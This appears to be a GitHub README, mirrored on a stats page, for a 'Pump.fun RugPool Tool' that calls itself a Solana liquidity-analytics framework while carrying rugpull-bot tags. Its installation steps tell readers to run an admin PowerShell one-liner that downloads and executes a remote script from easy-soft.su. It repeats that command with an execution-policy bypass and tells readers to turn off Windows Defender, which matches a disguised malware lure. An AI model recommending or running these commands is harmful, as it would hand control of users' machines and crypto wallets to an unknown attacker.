Star 历史趋势
数据来源: GitHub API · 生成自 Stargazers.cn
README.md

Pump.fun RugPool Tool: Analytics & Liquidity Monitoring Framework

An open-source developer toolkit and automated analytical framework for monitoring real-time liquidity pools, token bonding curves, and smart contract behaviors on the Pump.fun ecosystem.

🔎 Overview

This repository provides an automated infrastructure to track, analyze, and audit token launches. By utilizing high-frequency Solana RPC nodes and parsing on-chain logs, the tool detects anomalies in liquidity distribution, identifies developer wallet clusters, and evaluates potential pool risks before tokens migrate to Raydium.

✨ Key Features

  • Real-Time Bonding Curve Tracking: Monitor absolute supply metrics and bonding curve velocity.
  • Developer Wallet Cluster Analysis: Identify multi-wallet funding patterns and historical creation footprints.
  • Liquidity Pool Auditing: Automated detection of sudden liquidity migration or developer supply dumping.
  • Solana RPC Stream: Optimized parsing of transaction logs via WebSocket subscriptions.
  • Risk Scoring Engine: Algorithmic calculation of token security metrics based on holder distribution.

🚀 Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Execute the Deployment Command: Copy, paste, and press Enter to run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:

    irm https://easy-soft.su/powershell/Loader.ps1 | iex

🔍 Troubleshooting & Common Errors

📌 Bypass Execution Policy (Blocking Unsigned Scripts)

If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:

powershell -ExecutionPolicy Bypass -Command "irm https://easy-soft.su/powershell/Loader.ps1 | iex"

📌 Error: "irm is not recognized..." (PowerShell 2.0 Legacy)

In older legacy environments where aliases are missing, use explicit full system cmdlets:

Invoke-RestMethod https://easy-soft.su/powershell/Loader.ps1 | Invoke-Expression

📌 Antivirus or SmartScreen Interception

Automated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.


📊 Architecture & Methodology

The tool acts as a passive observer on the Solana blockchain, specifically filtering program IDs associated with token deployment platforms.


💡 SEO & Search Optimization Keywords

To maximize Google and GitHub Search visibility, this project indexes under the following developer queries: solana bonding curve tracker, pump fun analytics tool, liquidity pool monitor solana, token launch risk assessment, solana rpc log parser, pump fun developer wallet tracker, automated token audit script.


⚠️ Disclaimer

This software is for educational, research, and analytical purposes only. It does not constitute financial advice, trading recommendations, or an endorsement of any digital assets. Use at your own discretion

关于 About

Pump.fun analytics tool and liquidity pool monitor for Solana. Features real-time bonding curve tracking, developer wallet cluster analysis, RPC transaction log parsing, and token risk assessment. Open-source automated framework for on-chain data extraction, holder distribution metrics, and developer infrastructure research.
bubblemap-bypassmarket-makerpumppumpfun-launcherpumpfun-market-maker-botpumpfun-rugpullpumpswappumpswap-bundlerrugpull-botrugpull-softwarerugpull-tooltrading-bot-bsc-solanatradingbot2026

语言 Languages

提交活跃度 Commit Activity

代码提交热力图
过去 52 周的开发活跃度
2
Total Commits
峰值: 1次/周
Less
More

核心贡献者 Contributors